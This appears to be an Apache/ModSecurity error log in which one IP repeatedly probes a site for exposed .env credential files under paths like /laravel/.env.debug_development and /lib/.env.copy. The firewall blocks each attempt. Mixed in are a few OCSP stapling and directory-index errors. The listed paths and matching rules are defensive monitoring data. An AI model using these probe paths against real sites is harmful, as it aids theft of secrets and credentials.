[Mon May 11 11:20:13.486273 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:32934] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/kotlin/.env.old.dev"] [unique_id "agGfTWS6k_SCYd1AVZqkhQAAAQM"]
[Mon May 11 11:20:15.580040 2026] [security2:error] [pid 1254179:tid 1254184] [client 185.177.72.9:32934] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfTWS6k_SCYd1AVZqkhQAAAQM"]
[Mon May 11 11:20:15.607582 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:32946] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kotlin/.env.tmp_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/kotlin/.env.tmp_production"] [unique_id "agGfT2S6k_SCYd1AVZqkhwAAAQ8"]
[Mon May 11 11:20:15.607793 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:32946] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/kotlin/.env.tmp_production"] [unique_id "agGfT2S6k_SCYd1AVZqkhwAAAQ8"]
[Mon May 11 11:20:18.224075 2026] [security2:error] [pid 1254179:tid 1254196] [client 185.177.72.9:32946] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfT2S6k_SCYd1AVZqkhwAAAQ8"]
[Mon May 11 11:20:18.250845 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:32952] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kotlin/.env.tmp_production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/kotlin/.env.tmp_production"] [unique_id "agGfUkYQeUtAPynIs6xOjgAAAAo"]
[Mon May 11 11:20:18.251108 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:32952] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/kotlin/.env.tmp_production"] [unique_id "agGfUkYQeUtAPynIs6xOjgAAAAo"]
[Mon May 11 11:20:20.463022 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:32952] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfUkYQeUtAPynIs6xOjgAAAAo"]
[Mon May 11 11:20:31.082890 2026] [security2:error] [pid 1254133:tid 1254146] [client 45.133.170.60:56381] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGfXxjZymfuKpjWXehx0AAAAMo"], referer: https://www.piregwan-genesis.com/
[Mon May 11 11:20:43.135653 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:32862] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.debug_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/laravel/.env.debug_development"] [unique_id "agGfa0Rdw2n9wv6Ai4_93AAAAIc"]
[Mon May 11 11:20:43.136883 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:32862] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/laravel/.env.debug_development"] [unique_id "agGfa0Rdw2n9wv6Ai4_93AAAAIc"]
[Mon May 11 11:20:46.182012 2026] [autoindex:error] [pid 1254179:tid 1254182] [client 52.45.15.233:28292] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 11:20:46.186954 2026] [security2:error] [pid 1254328:tid 1254338] [client 185.177.72.9:32862] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfa0Rdw2n9wv6Ai4_93AAAAIc"]
[Mon May 11 11:20:46.214434 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:32876] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.debug_development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/laravel/.env.debug_development"] [unique_id "agGfbr4KNmD_mZ_vlf8uyQAAAEE"]
[Mon May 11 11:20:46.214659 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:32876] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/laravel/.env.debug_development"] [unique_id "agGfbr4KNmD_mZ_vlf8uyQAAAEE"]
[Mon May 11 11:20:49.115700 2026] [security2:error] [pid 1254242:tid 1254247] [client 185.177.72.9:32876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfbr4KNmD_mZ_vlf8uyQAAAEE"]
[Mon May 11 11:20:49.296518 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:32892] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.old.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/laravel/.env.old.min"] [unique_id "agGfcUYQeUtAPynIs6xOxwAAAAw"]
[Mon May 11 11:20:49.296747 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:32892] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/laravel/.env.old.min"] [unique_id "agGfcUYQeUtAPynIs6xOxwAAAAw"]
[Mon May 11 11:20:50.747022 2026] [security2:error] [pid 1254212:tid 1254226] [client 185.177.72.9:32892] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfcUYQeUtAPynIs6xOxwAAAAw"]
[Mon May 11 11:20:50.774135 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:32904] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env.old.min"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/laravel/.env.old.min"] [unique_id "agGfckRdw2n9wv6Ai4_-BQAAAIg"]
[Mon May 11 11:20:50.774382 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:32904] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/laravel/.env.old.min"] [unique_id "agGfckRdw2n9wv6Ai4_-BQAAAIg"]
[Mon May 11 11:20:52.758495 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:32904] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfckRdw2n9wv6Ai4_-BQAAAIg"]
[Mon May 11 11:20:55.709681 2026] [ssl:error] [pid 1254133:tid 1254159] (EAI 2)Name or service not known: [client 146.190.237.212:56140] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:20:55.709748 2026] [ssl:error] [pid 1254133:tid 1254159] AH01941: stapling_renew_response: responder error
[Mon May 11 11:20:56.704664 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:28842] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.config.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/lib/.env.config.copy"] [unique_id "agGfeL4KNmD_mZ_vlf8vCAAAAFc"]
[Mon May 11 11:20:56.704893 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:28842] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/lib/.env.config.copy"] [unique_id "agGfeL4KNmD_mZ_vlf8vCAAAAFc"]
[Mon May 11 11:20:58.197335 2026] [security2:error] [pid 1254242:tid 1254268] [client 185.177.72.9:28842] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfeL4KNmD_mZ_vlf8vCAAAAFc"]
[Mon May 11 11:20:58.224028 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:28850] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.config.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.config.copy"] [unique_id "agGfekRdw2n9wv6Ai4_-GgAAAIo"]
[Mon May 11 11:20:58.224365 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:28850] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.config.copy"] [unique_id "agGfekRdw2n9wv6Ai4_-GgAAAIo"]
[Mon May 11 11:20:58.607628 2026] [ssl:error] [pid 1256241:tid 1256255] (EAI 2)Name or service not known: [client 209.20.191.186:42373] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:20:58.607669 2026] [ssl:error] [pid 1256241:tid 1256255] AH01941: stapling_renew_response: responder error
[Mon May 11 11:20:59.426561 2026] [security2:error] [pid 1254328:tid 1254341] [client 185.177.72.9:28850] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfekRdw2n9wv6Ai4_-GgAAAIo"]
[Mon May 11 11:20:59.453515 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:28854] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/lib/.env.copy"] [unique_id "agGfexjZymfuKpjWXehyMQAAAM8"]
[Mon May 11 11:20:59.453722 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:28854] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/lib/.env.copy"] [unique_id "agGfexjZymfuKpjWXehyMQAAAM8"]
[Mon May 11 11:21:00.621052 2026] [security2:error] [pid 1254133:tid 1254151] [client 185.177.72.9:28854] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGfexjZymfuKpjWXehyMQAAAM8"]
[Mon May 11 11:21:00.648289 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:28860] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.copy"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.copy"] [unique_id "agGffL4KNmD_mZ_vlf8vEQAAAFU"]
[Mon May 11 11:21:00.648725 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:28860] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/lib/.env.copy"] [unique_id "agGffL4KNmD_mZ_vlf8vEQAAAFU"]
[Mon May 11 11:21:01.262938 2026] [ssl:error] [pid 1254133:tid 1254153] (EAI 2)Name or service not known: [client 178.171.13.31:45229] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:01.262966 2026] [ssl:error] [pid 1254133:tid 1254153] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:01.833962 2026] [security2:error] [pid 1254242:tid 1254266] [client 185.177.72.9:28860] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGffL4KNmD_mZ_vlf8vEQAAAFU"]
[Mon May 11 11:21:01.862985 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:28866] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lib/.env.example.tmp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/lib/.env.example.tmp"] [unique_id "agGffWS6k_SCYd1AVZqk1wAAAQw"]
[Mon May 11 11:21:01.863192 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:28866] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/lib/.env.example.tmp"] [unique_id "agGffWS6k_SCYd1AVZqk1wAAAQw"]
[Mon May 11 11:21:01.911250 2026] [ssl:error] [pid 1254212:tid 1254224] (EAI 2)Name or service not known: [client 173.225.42.20:52027] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 11:21:01.911295 2026] [ssl:error] [pid 1254212:tid 1254224] AH01941: stapling_renew_response: responder error
[Mon May 11 11:21:03.028872 2026] [security2:error] [pid 1254179:tid 1254193] [client 185.177.72.9:28866] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGffWS6k_SCYd1AVZqk1wAAAQw"]
